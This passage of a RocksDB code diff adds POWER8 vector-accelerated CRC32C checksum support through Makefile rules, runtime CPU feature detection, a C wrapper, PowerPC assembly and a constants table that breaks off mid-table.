./java/target/$(ROCKSDBJNILIB) @@ -1703,19 +1742,24 @@ IOSVERSION=$(shell defaults read $(PLATFORMSROOT)/iPhoneOS.platform/version CFBu lipo ios-x86/$@ ios-arm/$@ -create -output $@ else -.cc.o: +%.cc.o: %.cc $(AM_V_CC)$(CXX) $(CXXFLAGS) -c $< -o $@ $(COVERAGEFLAGS) -.c.o: +%.c.o: %.c + $(AM_V_CC)$(CC) $(CFLAGS) -c $< -o $@ + +%.S.o: %.S $(AM_V_CC)$(CC) $(CFLAGS) -c $< -o $@ -endif +endif # --------------------------------------------------------------------------- # Source files dependencies detection # --------------------------------------------------------------------------- all_sources = $(LIB_SOURCES) $(MAIN_SOURCES) $(MOCK_LIB_SOURCES) $(TOOL_LIB_SOURCES) $(BENCH_LIB_SOURCES) $(TEST_LIB_SOURCES) $(EXP_LIB_SOURCES) DEPFILES = $(all_sources:.cc=.d) +DEPFILES_C = $(LIB_SOURCES_C:.c=.d) +DEPFILES_ASM = $(LIB_SOURCES_ASM:.S=.d) # Add proper dependency support so changing a .h file forces a .cc file to # rebuild. @@ -1726,7 +1770,16 @@ $(DEPFILES): %.d: %.cc @$(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) \ -MM -MT'$@' -MT'$(<:.cc=.o)' "$<" -o '$@' -depend: $(DEPFILES) +$(DEPFILES_C): %.d: %.c + @$(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) \ + -MM -MT'$@' -MT'$(<:.c=.o)' "$<" -o '$@' + +$(DEPFILES_ASM): %.d: %.S + @$(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) \ + -MM -MT'$@' -MT'$(<:.S=.o)' "$<" -o '$@' + + +depend: $(DEPFILES) $(DEPFILES_C) $(DEPFILES_ASM) # if the make goal is either "clean" or "format", we shouldn't # try to import the *.d files. diff --git a/db/db_test_util.cc b/db/db_test_util.cc index 5ca4b19a253..98b6b471e70 100644 --- a/db/db_test_util.cc +++ b/db/db_test_util.cc @@ -277,12 +277,11 @@ Options DBTestBase::GetOptions( Options options = default_options; BlockBasedTableOptions table_options; bool set_block_based_table_factory = true; -#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && \ - !defined(OS_AIX) +#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && \ + !defined(OS_AIX) rocksdb::SyncPoint::GetInstance()->ClearCallBack( "NewRandomAccessFile:O_DIRECT"); - rocksdb::SyncPoint::GetInstance()->ClearCallBack( - "NewWritableFile:O_DIRECT"); + rocksdb::SyncPoint::GetInstance()->ClearCallBack("NewWritableFile:O_DIRECT"); #endif bool can_allow_mmap = IsMemoryMappedAccessSupported(); diff --git a/src.mk b/src.mk index fb7f979396c..39b1ed4895f 100644 --- a/src.mk +++ b/src.mk @@ -204,6 +204,16 @@ LIB_SOURCES = \ utilities/write_batch_with_index/write_batch_with_index.cc \ utilities/write_batch_with_index/write_batch_with_index_internal.cc \ +ifeq (,$(shell $(CXX) -fsyntax-only -maltivec -xc /dev/null 2>&1)) +LIB_SOURCES_ASM =\ + util/crc32c_ppc_asm.S +LIB_SOURCES_C = \ + util/crc32c_ppc.c +else +LIB_SOURCES_ASM = +LIB_SOURCES_C = +endif + TOOL_LIB_SOURCES = \ tools/ldb_cmd.cc \ tools/ldb_tool.cc \ diff --git a/tools/db_stress.cc b/tools/db_stress.cc index db905f0c887..b5d0c7589d8 100644 --- a/tools/db_stress.cc +++ b/tools/db_stress.cc @@ -2370,15 +2370,15 @@ int main(int argc, char** argv) { #if !defined(NDEBUG) && !defined(OS_MACOSX) && !defined(OS_WIN) && \ !defined(OS_SOLARIS) && !defined(OS_AIX) rocksdb::SyncPoint::GetInstance()->SetCallBack( - "NewWritableFile:O_DIRECT", [&](void* arg) { - int* val = static_cast(arg); - *val &= ~O_DIRECT; - }); + "NewWritableFile:O_DIRECT", [&](void* arg) { + int* val = static_cast(arg); + *val &= ~O_DIRECT; + }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "NewRandomAccessFile:O_DIRECT", [&](void* arg) { - int* val = static_cast(arg); - *val &= ~O_DIRECT; - }); + "NewRandomAccessFile:O_DIRECT", [&](void* arg) { + int* val = static_cast(arg); + *val &= ~O_DIRECT; + }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); #endif diff --git a/util/crc32c.cc b/util/crc32c.cc index ae36f82305b..9b78c92f181 100644 --- a/util/crc32c.cc +++ b/util/crc32c.cc @@ -18,9 +18,32 @@ #endif #include "util/coding.h" +#ifdef __powerpc64__ +#include "util/crc32c_ppc.h" +#include "util/crc32c_ppc_constants.h" + +#if __linux__ +#include + +#ifndef PPC_FEATURE2_VEC_CRYPTO +#define PPC_FEATURE2_VEC_CRYPTO 0x02000000 +#endif + +#ifndef AT_HWCAP2 +#define AT_HWCAP2 26 +#endif + +#endif /* __linux__ */ + +#endif + namespace rocksdb { namespace crc32c { +#ifdef __powerpc64__ +static int arch_ppc_crc32 = 0; +#endif + static const uint32_t table0_[256] = { 0x00000000, 0xf26b8303, 0xe13b70f7, 0x1350f3f4, 0xc79a971f, 0x35f1141c, 0x26a1e7e8, 0xd4ca64eb, @@ -371,6 +394,7 @@ uint32_t ExtendImpl(uint32_t crc, const char* buf, size_t size) { } // Detect if SS42 or not. +#ifndef HAVE_POWER8 static bool isSSE42() { #ifndef HAVE_SSE42 return false; @@ -387,15 +411,58 @@ static bool isSSE42() { return false; #endif } +#endif typedef uint32_t (*Function)(uint32_t, const char*, size_t); +#if defined(HAVE_POWER8) && defined(HAS_ALTIVEC) +uint32_t ExtendPPCImpl(uint32_t crc, const char *buf, size_t size) { + return crc32c_ppc(crc, (const unsigned char *)buf, size); +} + +#if __linux__ +static int arch_ppc_probe(void) { + arch_ppc_crc32 = 0; + +#if defined(__powerpc64__) + if (getauxval(AT_HWCAP2) & PPC_FEATURE2_VEC_CRYPTO) arch_ppc_crc32 = 1; +#endif /* __powerpc64__ */ + + return arch_ppc_crc32; +} +#endif // __linux__ + +static bool isAltiVec() { + if (arch_ppc_probe()) { + return true; + } else { + return false; + } +} +#endif + static inline Function Choose_Extend() { +#ifndef HAVE_POWER8 return isSSE42() ? ExtendImpl : ExtendImpl; +#else + return isAltiVec() ? ExtendPPCImpl : ExtendImpl; +#endif } bool IsFastCrc32Supported() { - return isSSE42(); + bool has_fast_crc = false; +#ifdef HAVE_POWER8 +#ifdef HAS_ALTIVEC + if (arch_ppc_probe()) { + has_fast_crc = true; + } +#else + has_fast_crc = false; +#endif +#else + has_fast_crc = isSSE42(); +#endif + return has_fast_crc; } Function ChosenExtend = Choose_Extend(); diff --git a/util/crc32c_ppc.c b/util/crc32c_ppc.c new file mode 100644 index 00000000000..3c517c88ca1 --- /dev/null +++ b/util/crc32c_ppc.c @@ -0,0 +1,95 @@ +// Copyright (c) 2017 International Business Machines Corp. +// All rights reserved. +// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. +// This source code is also licensed under the GPLv2 license found in the +// COPYING file in the root directory of this source tree. + +#define CRC_TABLE +#include +#include +#include +#include "util/crc32c_ppc_constants.h" + +#define VMX_ALIGN 16 +#define VMX_ALIGN_MASK (VMX_ALIGN - 1) + +#ifdef REFLECT +static unsigned int crc32_align(unsigned int crc, unsigned char const *p, + unsigned long len) { + while (len--) crc = crc_table[(crc ^ *p++) & 0xff] ^ (crc >> 8); + return crc; +} +#endif + +#ifdef HAVE_POWER8 +unsigned int __crc32_vpmsum(unsigned int crc, unsigned char const *p, + unsigned long len); + +static uint32_t crc32_vpmsum(uint32_t crc, unsigned char const *data, + unsigned len) { + unsigned int prealign; + unsigned int tail; + +#ifdef CRC_XOR + crc ^= 0xffffffff; +#endif + + if (len < VMX_ALIGN + VMX_ALIGN_MASK) { + crc = crc32_align(crc, data, (unsigned long)len); + goto out; + } + + if ((unsigned long)data & VMX_ALIGN_MASK) { + prealign = VMX_ALIGN - ((unsigned long)data & VMX_ALIGN_MASK); + crc = crc32_align(crc, data, prealign); + len -= prealign; + data += prealign; + } + + crc = __crc32_vpmsum(crc, data, (unsigned long)len & ~VMX_ALIGN_MASK); + + tail = len & VMX_ALIGN_MASK; + if (tail) { + data += len & ~VMX_ALIGN_MASK; + crc = crc32_align(crc, data, tail); + } + +out: +#ifdef CRC_XOR + crc ^= 0xffffffff; +#endif + + return crc; +} + +/* This wrapper function works around the fact that crc32_vpmsum + * does not gracefully handle the case where the data pointer is NULL. There + * may be room for performance improvement here. + */ +uint32_t crc32c_ppc(uint32_t crc, unsigned char const *data, unsigned len) { + unsigned char *buf2; + + if (!data) { + buf2 = (unsigned char *)malloc(len); + bzero(buf2, len); + crc = crc32_vpmsum(crc, buf2, len); + free(buf2); + } else { + crc = crc32_vpmsum(crc, data, (unsigned long)len); + } + return crc; +} + +#else /* HAVE_POWER8 */ + +/* This symbol has to exist on non-ppc architectures (and on legacy + * ppc systems using power7 or below) in order to compile properly + * there, even though it won't be called. + */ +uint32_t crc32c_ppc(uint32_t crc, unsigned char const *data, unsigned len) { + return 0; +} + +#endif /* HAVE_POWER8 */ diff --git a/util/crc32c_ppc.h b/util/crc32c_ppc.h new file mode 100644 index 00000000000..b52ad9b2a42 --- /dev/null +++ b/util/crc32c_ppc.h @@ -0,0 +1,23 @@ +// Copyright (c) 2017 International Business Machines Corp. +// All rights reserved. +// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. +// This source code is also licensed under the GPLv2 license found in the +// COPYING file in the root directory of this source tree. + +#ifndef CRC32C_PPC_H +#define CRC32C_PPC_H + +#ifdef __cplusplus +extern "C" { +#endif + +extern uint32_t crc32c_ppc(uint32_t crc, unsigned char const *buffer, + unsigned len); + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/util/crc32c_ppc_asm.S b/util/crc32c_ppc_asm.S new file mode 100644 index 00000000000..6de79797335 --- /dev/null +++ b/util/crc32c_ppc_asm.S @@ -0,0 +1,753 @@ +// Copyright (c) 2015 Anton Blanchard , IBM +// Copyright (c) 2017 International Business Machines Corp. +// All rights reserved. +// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. +// This source code is also licensed under the GPLv2 license found in the +// COPYING file in the root directory of this source tree. + +#include +#include "ppc-opcode.h" + +#undef toc + +#ifndef r1 +#define r1 1 +#endif + +#ifndef r2 +#define r2 2 +#endif + + .section .rodata +.balign 16 + +.byteswap_constant: + /* byte reverse permute constant */ + .octa 0x0F0E0D0C0B0A09080706050403020100 + +#define __ASSEMBLY__ +#include "crc32c_ppc_constants.h" + + .text + +#if defined(__BIG_ENDIAN__) && defined(REFLECT) +#define BYTESWAP_DATA +#elif defined(__LITTLE_ENDIAN__) && !defined(REFLECT) +#define BYTESWAP_DATA +#else +#undef BYTESWAP_DATA +#endif + +#define off16 r25 +#define off32 r26 +#define off48 r27 +#define off64 r28 +#define off80 r29 +#define off96 r30 +#define off112 r31 + +#define const1 v24 +#define const2 v25 + +#define byteswap v26 +#define mask_32bit v27 +#define mask_64bit v28 +#define zeroes v29 + +#ifdef BYTESWAP_DATA +#define VPERM(A, B, C, D) vperm A, B, C, D +#else +#define VPERM(A, B, C, D) +#endif + +/* unsigned int __crc32_vpmsum(unsigned int crc, void *p, unsigned long len) */ +FUNC_START(__crc32_vpmsum) + std r31,-8(r1) + std r30,-16(r1) + std r29,-24(r1) + std r28,-32(r1) + std r27,-40(r1) + std r26,-48(r1) + std r25,-56(r1) + + li off16,16 + li off32,32 + li off48,48 + li off64,64 + li off80,80 + li off96,96 + li off112,112 + li r0,0 + + /* Enough room for saving 10 non volatile VMX registers */ + subi r6,r1,56+10*16 + subi r7,r1,56+2*16 + + stvx v20,0,r6 + stvx v21,off16,r6 + stvx v22,off32,r6 + stvx v23,off48,r6 + stvx v24,off64,r6 + stvx v25,off80,r6 + stvx v26,off96,r6 + stvx v27,off112,r6 + stvx v28,0,r7 + stvx v29,off16,r7 + + mr r10,r3 + + vxor zeroes,zeroes,zeroes + vspltisw v0,-1 + + vsldoi mask_32bit,zeroes,v0,4 + vsldoi mask_64bit,zeroes,v0,8 + + /* Get the initial value into v8 */ + vxor v8,v8,v8 + MTVRD(v8, r3) +#ifdef REFLECT + vsldoi v8,zeroes,v8,8 /* shift into bottom 32 bits */ +#else + vsldoi v8,v8,zeroes,4 /* shift into top 32 bits */ +#endif + +#ifdef BYTESWAP_DATA + addis r3,r2,.byteswap_constant@toc@ha + addi r3,r3,.byteswap_constant@toc@l + + lvx byteswap,0,r3 + addi r3,r3,16 +#endif + + cmpdi r5,256 + blt .Lshort + + rldicr r6,r5,0,56 + + /* Checksum in blocks of MAX_SIZE */ +1: lis r7,MAX_SIZE@h + ori r7,r7,MAX_SIZE@l + mr r9,r7 + cmpd r6,r7 + bgt 2f + mr r7,r6 +2: subf r6,r7,r6 + + /* our main loop does 128 bytes at a time */ + srdi r7,r7,7 + + /* + * Work out the offset into the constants table to start at. Each + * constant is 16 bytes, and it is used against 128 bytes of input + * data - 128 / 16 = 8 + */ + sldi r8,r7,4 + srdi r9,r9,3 + subf r8,r8,r9 + + /* We reduce our final 128 bytes in a separate step */ + addi r7,r7,-1 + mtctr r7 + + addis r3,r2,.constants@toc@ha + addi r3,r3,.constants@toc@l + + /* Find the start of our constants */ + add r3,r3,r8 + + /* zero v0-v7 which will contain our checksums */ + vxor v0,v0,v0 + vxor v1,v1,v1 + vxor v2,v2,v2 + vxor v3,v3,v3 + vxor v4,v4,v4 + vxor v5,v5,v5 + vxor v6,v6,v6 + vxor v7,v7,v7 + + lvx const1,0,r3 + + /* + * If we are looping back to consume more data we use the values + * already in v16-v23. + */ + cmpdi r0,1 + beq 2f + + /* First warm up pass */ + lvx v16,0,r4 + lvx v17,off16,r4 + VPERM(v16,v16,v16,byteswap) + VPERM(v17,v17,v17,byteswap) + lvx v18,off32,r4 + lvx v19,off48,r4 + VPERM(v18,v18,v18,byteswap) + VPERM(v19,v19,v19,byteswap) + lvx v20,off64,r4 + lvx v21,off80,r4 + VPERM(v20,v20,v20,byteswap) + VPERM(v21,v21,v21,byteswap) + lvx v22,off96,r4 + lvx v23,off112,r4 + VPERM(v22,v22,v22,byteswap) + VPERM(v23,v23,v23,byteswap) + addi r4,r4,8*16 + + /* xor in initial value */ + vxor v16,v16,v8 + +2: bdz .Lfirst_warm_up_done + + addi r3,r3,16 + lvx const2,0,r3 + + /* Second warm up pass */ + VPMSUMD(v8,v16,const1) + lvx v16,0,r4 + VPERM(v16,v16,v16,byteswap) + ori r2,r2,0 + + VPMSUMD(v9,v17,const1) + lvx v17,off16,r4 + VPERM(v17,v17,v17,byteswap) + ori r2,r2,0 + + VPMSUMD(v10,v18,const1) + lvx v18,off32,r4 + VPERM(v18,v18,v18,byteswap) + ori r2,r2,0 + + VPMSUMD(v11,v19,const1) + lvx v19,off48,r4 + VPERM(v19,v19,v19,byteswap) + ori r2,r2,0 + + VPMSUMD(v12,v20,const1) + lvx v20,off64,r4 + VPERM(v20,v20,v20,byteswap) + ori r2,r2,0 + + VPMSUMD(v13,v21,const1) + lvx v21,off80,r4 + VPERM(v21,v21,v21,byteswap) + ori r2,r2,0 + + VPMSUMD(v14,v22,const1) + lvx v22,off96,r4 + VPERM(v22,v22,v22,byteswap) + ori r2,r2,0 + + VPMSUMD(v15,v23,const1) + lvx v23,off112,r4 + VPERM(v23,v23,v23,byteswap) + + addi r4,r4,8*16 + + bdz .Lfirst_cool_down + + /* + * main loop. We modulo schedule it such that it takes three iterations + * to complete - first iteration load, second iteration vpmsum, third + * iteration xor. + */ + .balign 16 +4: lvx const1,0,r3 + addi r3,r3,16 + ori r2,r2,0 + + vxor v0,v0,v8 + VPMSUMD(v8,v16,const2) + lvx v16,0,r4 + VPERM(v16,v16,v16,byteswap) + ori r2,r2,0 + + vxor v1,v1,v9 + VPMSUMD(v9,v17,const2) + lvx v17,off16,r4 + VPERM(v17,v17,v17,byteswap) + ori r2,r2,0 + + vxor v2,v2,v10 + VPMSUMD(v10,v18,const2) + lvx v18,off32,r4 + VPERM(v18,v18,v18,byteswap) + ori r2,r2,0 + + vxor v3,v3,v11 + VPMSUMD(v11,v19,const2) + lvx v19,off48,r4 + VPERM(v19,v19,v19,byteswap) + lvx const2,0,r3 + ori r2,r2,0 + + vxor v4,v4,v12 + VPMSUMD(v12,v20,const1) + lvx v20,off64,r4 + VPERM(v20,v20,v20,byteswap) + ori r2,r2,0 + + vxor v5,v5,v13 + VPMSUMD(v13,v21,const1) + lvx v21,off80,r4 + VPERM(v21,v21,v21,byteswap) + ori r2,r2,0 + + vxor v6,v6,v14 + VPMSUMD(v14,v22,const1) + lvx v22,off96,r4 + VPERM(v22,v22,v22,byteswap) + ori r2,r2,0 + + vxor v7,v7,v15 + VPMSUMD(v15,v23,const1) + lvx v23,off112,r4 + VPERM(v23,v23,v23,byteswap) + + addi r4,r4,8*16 + + bdnz 4b + +.Lfirst_cool_down: + /* First cool down pass */ + lvx const1,0,r3 + addi r3,r3,16 + + vxor v0,v0,v8 + VPMSUMD(v8,v16,const1) + ori r2,r2,0 + + vxor v1,v1,v9 + VPMSUMD(v9,v17,const1) + ori r2,r2,0 + + vxor v2,v2,v10 + VPMSUMD(v10,v18,const1) + ori r2,r2,0 + + vxor v3,v3,v11 + VPMSUMD(v11,v19,const1) + ori r2,r2,0 + + vxor v4,v4,v12 + VPMSUMD(v12,v20,const1) + ori r2,r2,0 + + vxor v5,v5,v13 + VPMSUMD(v13,v21,const1) + ori r2,r2,0 + + vxor v6,v6,v14 + VPMSUMD(v14,v22,const1) + ori r2,r2,0 + + vxor v7,v7,v15 + VPMSUMD(v15,v23,const1) + ori r2,r2,0 + +.Lsecond_cool_down: + /* Second cool down pass */ + vxor v0,v0,v8 + vxor v1,v1,v9 + vxor v2,v2,v10 + vxor v3,v3,v11 + vxor v4,v4,v12 + vxor v5,v5,v13 + vxor v6,v6,v14 + vxor v7,v7,v15 + +#ifdef REFLECT + /* + * vpmsumd produces a 96 bit result in the least significant bits + * of the register. Since we are bit reflected we have to shift it + * left 32 bits so it occupies the least significant bits in the + * bit reflected domain. + */ + vsldoi v0,v0,zeroes,4 + vsldoi v1,v1,zeroes,4 + vsldoi v2,v2,zeroes,4 + vsldoi v3,v3,zeroes,4 + vsldoi v4,v4,zeroes,4 + vsldoi v5,v5,zeroes,4 + vsldoi v6,v6,zeroes,4 + vsldoi v7,v7,zeroes,4 +#endif + + /* xor with last 1024 bits */ + lvx v8,0,r4 + lvx v9,off16,r4 + VPERM(v8,v8,v8,byteswap) + VPERM(v9,v9,v9,byteswap) + lvx v10,off32,r4 + lvx v11,off48,r4 + VPERM(v10,v10,v10,byteswap) + VPERM(v11,v11,v11,byteswap) + lvx v12,off64,r4 + lvx v13,off80,r4 + VPERM(v12,v12,v12,byteswap) + VPERM(v13,v13,v13,byteswap) + lvx v14,off96,r4 + lvx v15,off112,r4 + VPERM(v14,v14,v14,byteswap) + VPERM(v15,v15,v15,byteswap) + + addi r4,r4,8*16 + + vxor v16,v0,v8 + vxor v17,v1,v9 + vxor v18,v2,v10 + vxor v19,v3,v11 + vxor v20,v4,v12 + vxor v21,v5,v13 + vxor v22,v6,v14 + vxor v23,v7,v15 + + li r0,1 + cmpdi r6,0 + addi r6,r6,128 + bne 1b + + /* Work out how many bytes we have left */ + andi. r5,r5,127 + + /* Calculate where in the constant table we need to start */ + subfic r6,r5,128 + add r3,r3,r6 + + /* How many 16 byte chunks are in the tail */ + srdi r7,r5,4 + mtctr r7 + + /* + * Reduce the previously calculated 1024 bits to 64 bits, shifting + * 32 bits to include the trailing 32 bits of zeros + */ + lvx v0,0,r3 + lvx v1,off16,r3 + lvx v2,off32,r3 + lvx v3,off48,r3 + lvx v4,off64,r3 + lvx v5,off80,r3 + lvx v6,off96,r3 + lvx v7,off112,r3 + addi r3,r3,8*16 + + VPMSUMW(v0,v16,v0) + VPMSUMW(v1,v17,v1) + VPMSUMW(v2,v18,v2) + VPMSUMW(v3,v19,v3) + VPMSUMW(v4,v20,v4) + VPMSUMW(v5,v21,v5) + VPMSUMW(v6,v22,v6) + VPMSUMW(v7,v23,v7) + + /* Now reduce the tail (0 - 112 bytes) */ + cmpdi r7,0 + beq 1f + + lvx v16,0,r4 + lvx v17,0,r3 + VPERM(v16,v16,v16,byteswap) + VPMSUMW(v16,v16,v17) + vxor v0,v0,v16 + bdz 1f + + lvx v16,off16,r4 + lvx v17,off16,r3 + VPERM(v16,v16,v16,byteswap) + VPMSUMW(v16,v16,v17) + vxor v0,v0,v16 + bdz 1f + + lvx v16,off32,r4 + lvx v17,off32,r3 + VPERM(v16,v16,v16,byteswap) + VPMSUMW(v16,v16,v17) + vxor v0,v0,v16 + bdz 1f + + lvx v16,off48,r4 + lvx v17,off48,r3 + VPERM(v16,v16,v16,byteswap) + VPMSUMW(v16,v16,v17) + vxor v0,v0,v16 + bdz 1f + + lvx v16,off64,r4 + lvx v17,off64,r3 + VPERM(v16,v16,v16,byteswap) + VPMSUMW(v16,v16,v17) + vxor v0,v0,v16 + bdz 1f + + lvx v16,off80,r4 + lvx v17,off80,r3 + VPERM(v16,v16,v16,byteswap) + VPMSUMW(v16,v16,v17) + vxor v0,v0,v16 + bdz 1f + + lvx v16,off96,r4 + lvx v17,off96,r3 + VPERM(v16,v16,v16,byteswap) + VPMSUMW(v16,v16,v17) + vxor v0,v0,v16 + + /* Now xor all the parallel chunks together */ +1: vxor v0,v0,v1 + vxor v2,v2,v3 + vxor v4,v4,v5 + vxor v6,v6,v7 + + vxor v0,v0,v2 + vxor v4,v4,v6 + + vxor v0,v0,v4 + +.Lbarrett_reduction: + /* Barrett constants */ + addis r3,r2,.barrett_constants@toc@ha + addi r3,r3,.barrett_constants@toc@l + + lvx const1,0,r3 + lvx const2,off16,r3 + + vsldoi v1,v0,v0,8 + vxor v0,v0,v1 /* xor two 64 bit results together */ + +#ifdef REFLECT + /* shift left one bit */ + vspltisb v1,1 + vsl v0,v0,v1 +#endif + + vand v0,v0,mask_64bit + +#ifndef REFLECT + /* + * Now for the Barrett reduction algorithm. The idea is to calculate q, + * the multiple of our polynomial that we need to subtract. By + * doing the computation 2x bits higher (ie 64 bits) and shifting the + * result back down 2x bits, we round down to the nearest multiple. + */ + VPMSUMD(v1,v0,const1) /* ma */ + vsldoi v1,zeroes,v1,8 /* q = floor(ma/(2^64)) */ + VPMSUMD(v1,v1,const2) /* qn */ + vxor v0,v0,v1 /* a - qn, subtraction is xor in GF(2) */ + + /* + * Get the result into r3. We need to shift it left 8 bytes: + * V0 [ 0 1 2 X ] + * V0 [ 0 X 2 3 ] + */ + vsldoi v0,v0,zeroes,8 /* shift result into top 64 bits */ +#else + /* + * The reflected version of Barrett reduction. Instead of bit + * reflecting our data (which is expensive to do), we bit reflect our + * constants and our algorithm, which means the intermediate data in + * our vector registers goes from 0-63 instead of 63-0. We can reflect + * the algorithm because we don't carry in mod 2 arithmetic. + */ + vand v1,v0,mask_32bit /* bottom 32 bits of a */ + VPMSUMD(v1,v1,const1) /* ma */ + vand v1,v1,mask_32bit /* bottom 32bits of ma */ + VPMSUMD(v1,v1,const2) /* qn */ + vxor v0,v0,v1 /* a - qn, subtraction is xor in GF(2) */ + + /* + * Since we are bit reflected, the result (ie the low 32 bits) is in + * the high 32 bits. We just need to shift it left 4 bytes + * V0 [ 0 1 X 3 ] + * V0 [ 0 X 2 3 ] + */ + vsldoi v0,v0,zeroes,4 /* shift result into top 64 bits of */ +#endif + + /* Get it into r3 */ + MFVRD(r3, v0) + +.Lout: + subi r6,r1,56+10*16 + subi r7,r1,56+2*16 + + lvx v20,0,r6 + lvx v21,off16,r6 + lvx v22,off32,r6 + lvx v23,off48,r6 + lvx v24,off64,r6 + lvx v25,off80,r6 + lvx v26,off96,r6 + lvx v27,off112,r6 + lvx v28,0,r7 + lvx v29,off16,r7 + + ld r31,-8(r1) + ld r30,-16(r1) + ld r29,-24(r1) + ld r28,-32(r1) + ld r27,-40(r1) + ld r26,-48(r1) + ld r25,-56(r1) + + blr + +.Lfirst_warm_up_done: + lvx const1,0,r3 + addi r3,r3,16 + + VPMSUMD(v8,v16,const1) + VPMSUMD(v9,v17,const1) + VPMSUMD(v10,v18,const1) + VPMSUMD(v11,v19,const1) + VPMSUMD(v12,v20,const1) + VPMSUMD(v13,v21,const1) + VPMSUMD(v14,v22,const1) + VPMSUMD(v15,v23,const1) + + b .Lsecond_cool_down + +.Lshort: + cmpdi r5,0 + beq .Lzero + + addis r3,r2,.short_constants@toc@ha + addi r3,r3,.short_constants@toc@l + + /* Calculate where in the constant table we need to start */ + subfic r6,r5,256 + add r3,r3,r6 + + /* How many 16 byte chunks? */ + srdi r7,r5,4 + mtctr r7 + + vxor v19,v19,v19 + vxor v20,v20,v20 + + lvx v0,0,r4 + lvx v16,0,r3 + VPERM(v0,v0,v16,byteswap) + vxor v0,v0,v8 /* xor in initial value */ + VPMSUMW(v0,v0,v16) + bdz .Lv0 + + lvx v1,off16,r4 + lvx v17,off16,r3 + VPERM(v1,v1,v17,byteswap) + VPMSUMW(v1,v1,v17) + bdz .Lv1 + + lvx v2,off32,r4 + lvx v16,off32,r3 + VPERM(v2,v2,v16,byteswap) + VPMSUMW(v2,v2,v16) + bdz .Lv2 + + lvx v3,off48,r4 + lvx v17,off48,r3 + VPERM(v3,v3,v17,byteswap) + VPMSUMW(v3,v3,v17) + bdz .Lv3 + + lvx v4,off64,r4 + lvx v16,off64,r3 + VPERM(v4,v4,v16,byteswap) + VPMSUMW(v4,v4,v16) + bdz .Lv4 + + lvx v5,off80,r4 + lvx v17,off80,r3 + VPERM(v5,v5,v17,byteswap) + VPMSUMW(v5,v5,v17) + bdz .Lv5 + + lvx v6,off96,r4 + lvx v16,off96,r3 + VPERM(v6,v6,v16,byteswap) + VPMSUMW(v6,v6,v16) + bdz .Lv6 + + lvx v7,off112,r4 + lvx v17,off112,r3 + VPERM(v7,v7,v17,byteswap) + VPMSUMW(v7,v7,v17) + bdz .Lv7 + + addi r3,r3,128 + addi r4,r4,128 + + lvx v8,0,r4 + lvx v16,0,r3 + VPERM(v8,v8,v16,byteswap) + VPMSUMW(v8,v8,v16) + bdz .Lv8 + + lvx v9,off16,r4 + lvx v17,off16,r3 + VPERM(v9,v9,v17,byteswap) + VPMSUMW(v9,v9,v17) + bdz .Lv9 + + lvx v10,off32,r4 + lvx v16,off32,r3 + VPERM(v10,v10,v16,byteswap) + VPMSUMW(v10,v10,v16) + bdz .Lv10 + + lvx v11,off48,r4 + lvx v17,off48,r3 + VPERM(v11,v11,v17,byteswap) + VPMSUMW(v11,v11,v17) + bdz .Lv11 + + lvx v12,off64,r4 + lvx v16,off64,r3 + VPERM(v12,v12,v16,byteswap) + VPMSUMW(v12,v12,v16) + bdz .Lv12 + + lvx v13,off80,r4 + lvx v17,off80,r3 + VPERM(v13,v13,v17,byteswap) + VPMSUMW(v13,v13,v17) + bdz .Lv13 + + lvx v14,off96,r4 + lvx v16,off96,r3 + VPERM(v14,v14,v16,byteswap) + VPMSUMW(v14,v14,v16) + bdz .Lv14 + + lvx v15,off112,r4 + lvx v17,off112,r3 + VPERM(v15,v15,v17,byteswap) + VPMSUMW(v15,v15,v17) + +.Lv15: vxor v19,v19,v15 +.Lv14: vxor v20,v20,v14 +.Lv13: vxor v19,v19,v13 +.Lv12: vxor v20,v20,v12 +.Lv11: vxor v19,v19,v11 +.Lv10: vxor v20,v20,v10 +.Lv9: vxor v19,v19,v9 +.Lv8: vxor v20,v20,v8 +.Lv7: vxor v19,v19,v7 +.Lv6: vxor v20,v20,v6 +.Lv5: vxor v19,v19,v5 +.Lv4: vxor v20,v20,v4 +.Lv3: vxor v19,v19,v3 +.Lv2: vxor v20,v20,v2 +.Lv1: vxor v19,v19,v1 +.Lv0: vxor v20,v20,v0 + + vxor v0,v19,v20 + + b .Lbarrett_reduction + +.Lzero: + mr r3,r10 + b .Lout + +FUNC_END(__crc32_vpmsum) diff --git a/util/crc32c_ppc_constants.h b/util/crc32c_ppc_constants.h new file mode 100644 index 00000000000..aa5ea98f8e2 --- /dev/null +++ b/util/crc32c_ppc_constants.h @@ -0,0 +1,893 @@ +// Copyright (C) 2015, 2017 International Business Machines Corp. +// All rights reserved. +// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. +// This source code is also licensed under the GPLv2 license found in the +// COPYING file in the root directory of this source tree. +#ifndef CRC32C_PPC_CONST_H +#define CRC32C_PPC_CONST_H +#define CRC 0x1edc6f41 +#define REFLECT +#define CRC_XOR + +#ifndef __ASSEMBLY__ +#ifdef CRC_TABLE +static const unsigned int crc_table[] = { + 0x00000000, 0xf26b8303, 0xe13b70f7, 0x1350f3f4, 0xc79a971f, 0x35f1141c, + 0x26a1e7e8, 0xd4ca64eb, 0x8ad958cf, 0x78b2dbcc, 0x6be22838, 0x9989ab3b, + 0x4d43cfd0, 0xbf284cd3, 0xac78bf27, 0x5e133c24, 0x105ec76f, 0xe235446c, + 0xf165b798, 0x030e349b, 0xd7c45070, 0x25afd373, 0x36ff2087, 0xc494a384, + 0x9a879fa0, 0x68ec1ca3, 0x7bbcef57, 0x89d76c54, 0x5d1d08bf, 0xaf768bbc, + 0xbc267848, 0x4e4dfb4b, 0x20bd8ede, 0xd2d60ddd, 0xc186fe29, 0x33ed7d2a, + 0xe72719c1, 0x154c9ac2, 0x061c6936, 0xf477ea35, 0xaa64d611, 0x580f5512, + 